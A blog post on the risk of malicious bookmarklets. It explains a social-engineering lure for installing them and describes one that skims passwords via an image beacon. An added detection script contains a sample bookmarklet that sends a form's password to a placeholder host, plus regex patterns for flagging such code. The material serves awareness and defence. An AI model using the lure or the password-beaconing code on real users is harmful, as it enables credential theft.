In your address bar type:
and press the enter key.
Nobody would try to type that in!
But if you can social engineer someone to copy and paste malicious code into the address bar, couldn’t you just as easily social engineer them to drag a bookmarklet from a web page to their favorites or bookmark bar and click it?
You may have seen a warning message when you did that. Newer versions of IE and Opera provide a warning when you drag and drop a bookmarklet onto the favorites bar. Other browsers don’t.
While browsers prevent typing the bookmarklet directly into the browser’s address bar, they don’t do anything to stop you from adding a bookmarklet.
Returning to the Facebook example above, Facebook does not let you add a bookmarklet to a Facebook post. Instead you would create a post with a link to a page with the bookmarklet on it. The post in Facebook would tell the victim to visit a page, the page would hook them with an offer, tell them to drag and drop the bookmarklet onto the bookmark bar, and then tell them to return to Facebook and click on the bookmarklet to win some fabulous prize.
What could a malicious bookmarklet do? If it was well-written, it could do something really useful so that you would keep using it while it worked its evil behind the scenes. (Did you drag the hi bookmarklet to your bookmark bar? Don’t panic!)
For example, it could monitor the page you are on when you click it and look for forms with password fields. If it found one, it would wait until the form was submitted, collect the username and password, and send them to a third-party server by appending them as a query string to an image request, a technique known as pixel tracking, which is the same mechanism Google Analytics uses.
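As an added defender-side example (not code from the original post), the script below pulls bookmarklets out of a page's HTML and flags the combination just described, so a reviewer can triage a bookmarklet before dragging it to the bar. The sample HTML and the example.invalid host are constructed for this example.

```javascript
// Added example (not the original post's code): a triage helper that pulls
// bookmarklets (javascript: links) out of a page's HTML and flags the pattern
// described above: password field + submit hook + image request ("pixel tracking").
// SAMPLE_HTML and the example.invalid host are constructed for this example.
const SAMPLE_HTML = `
<p>Drag me: <a href="javascript:(function(){alert('hi')})()">hi</a></p>
<p>Prize: <a href="javascript:(function(){var f=document.forms[0];
f.addEventListener('submit',function(){var p=f.querySelector('input[type=password]');
new Image().src='http://example.invalid/p.gif?u='+p.value;});})()">Win!</a></p>`;

// One indicator alone is not proof of malice (honest bookmarklets read the DOM
// too); it is the combination that matches the behaviour the post warns about.
const INDICATORS = [
  { id: 'password-field', re: /type\s*=+\s*['"]?password/i },
  { id: 'submit-hook', re: /\bonsubmit\b|addEventListener\(\s*['"]submit['"]/i },
  { id: 'image-beacon', re: /new\s+Image\s*\(|\.src\s*=\s*['"]https?:/i },
];

// Extract every <a href="javascript:..."> link. The backreference \1 matches the
// quote that opened the attribute, so quotes inside the code do not end it early.
function extractBookmarklets(html) {
  const re = /<a\b[^>]*?href\s*=\s*(["'])\s*javascript:(.*?)\1[^>]*>(.*?)<\/a>/gis;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    let code = m[2];
    try { code = decodeURIComponent(code); } catch (e) { /* not URL-encoded */ }
    found.push({ label: m[3].replace(/<[^>]+>/g, '').trim(), code });
  }
  return found;
}

// 'block' when all three indicators fire, 'review' if any one does, else 'ok'.
function triage(bookmarklet) {
  const hits = INDICATORS.filter(i => i.re.test(bookmarklet.code)).map(i => i.id);
  const verdict = hits.length === INDICATORS.length ? 'block'
    : hits.length ? 'review' : 'ok';
  return { label: bookmarklet.label, hits, verdict };
}

function triagePage(html) {
  return extractBookmarklets(html).map(triage);
}

for (const r of triagePage(SAMPLE_HTML)) {
  console.log(`${r.label}: ${r.verdict} (${r.hits.join(', ') || 'no indicators'})`);
}
```

The regexes are deliberately loose and only look at the decoded source, so a minified or obfuscated bookmarklet that scores 'review' still needs a human read.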
What does this all mean to users? Should they not use bookmarklets? As I said at the beginning, I am a fan of bookmarklets, and I don’t want to see them blocked. They can be extremely useful. But users need to be aware of the potential dangers. They should only save bookmarklets from sites they trust. As with any download (be it a bookmarklet or a program), be cautious and make sure you are downloading from the actual site and not a phishing site (one that looks authentic) or a third-party site that purports to offer the same bookmarklet.
I think that IE now has it right. Whenever you drag a bookmarklet to the bookmark/favorites bar you should see a warning.
“Knowledge comes by eyes always open and working hands;
and there is no knowledge that is not power.”